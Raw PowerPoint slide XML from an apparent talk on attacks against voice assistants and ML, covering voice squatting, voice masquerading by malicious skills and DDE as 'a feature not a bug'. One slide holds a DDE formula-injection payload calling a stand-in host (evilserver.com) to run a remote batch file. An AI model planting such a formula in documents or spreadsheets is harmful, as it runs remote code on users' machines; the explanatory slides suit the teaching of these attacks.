              <a:t>Please Open Capital One</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” than proper skill behind “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Open Capital One</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="723900" indent="-279400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>51% of people use polite words before skills i.e. please can you…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6076868-4D8D-4A7C-95D5-84C367B1AE08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5674173" y="3038352"/>
            <a:ext cx="4451687" cy="2123658"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>         Voice Masquerading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="914400"/>
            <a:endParaRPr lang="en-GB" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the trust system on the VPA is abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The VPA relies on the current running skill     (which may be malicious) to stop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The malicious skill is then in a position to gather all types of confidential information as it continues running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" defTabSz="914400">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Real life tests show this is possible and people don’t pay attention to light indicating skill is active</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D903F5-FE79-422E-8475-C6093D73129C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2386165" y="5808585"/>
            <a:ext cx="6342966" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There is evidence of multiple skills that could be abused in the above ways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12452153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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F9D1675-7337-4537-AA8F-A116C6BC23A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId6">
                    <a14:imgEffect>
                      <a14:saturation sat="0"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="6791" t="13983" r="8913" b="19350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2324" y="1486184"/>
            <a:ext cx="12191999" cy="5423718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404CD891-6E84-4B2B-8FCF-0257D78B4016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6973" y="1479489"/>
            <a:ext cx="12196648" cy="5533741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="57000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342875" indent="-342875" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742895" indent="-285729" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1142915" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600080" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057246" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514411" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971578" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3428744" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3885909" indent="-228582" algn="l" defTabSz="457166"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endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Feature based attacks in Cyber vs AI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DDE : Cyber world it’s a feature not a bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15373971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CF10C2B9-90CE-4638-8F1C-14F3FE23050B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1486184"/>
            <a:ext cx="12191999" cy="5371815"/>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ZA" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>|’/c \\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>evilserver.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>sp.bat;IEX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> $e’!A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="DDE hack v2">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E775BE9C-A472-48FD-8CEB-6821D5FDA640}"/>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728246" y="1581715"/>
            <a:ext cx="10395119" cy="5197560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="579495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4328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2"/>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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D10CF458-E985-494F-8089-E57336EE3B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:grayscl/>
          </a:blip>
          <a:srcRect l="14060" t="25040"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6114" y="1486184"/>
            <a:ext cx="12194323" cy="5936020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98CFEFEC-3004-4BFE-B0B4-07DB00920BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228060" y="2145870"/>
            <a:ext cx="3984017" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SUPERVISED </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>LEARNING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I have lots of data with labels and goal is to teach the ML model to predict the outcome of future data. New data I haven’t seen before needs to behave/look the same as the data I used to train</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5607325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25285" y="842138"/>
            <a:ext cx="2280234"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Author name her</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>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17" name="TextBox 16"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F9D1675-7337-4537-AA8F-A116C6BC23A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId6">
                    <a14:imgEffect>
                      <a14:saturation sat="0"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="6791" t="13983" r="8913" b="19350"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2324" y="1486184"/>
            <a:ext cx="12191999" cy="5423718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404CD891-6E84-4B2B-8FCF-0257D78B4016}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6973" y="1479489"/>
            <a:ext cx="12196648" cy="5533741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="57000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="342875" indent="-342875" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742895" indent="-285729" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1142915" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600080" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057246" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="1400" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514411" indent="-228582" algn="l" defTabSz="457166" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
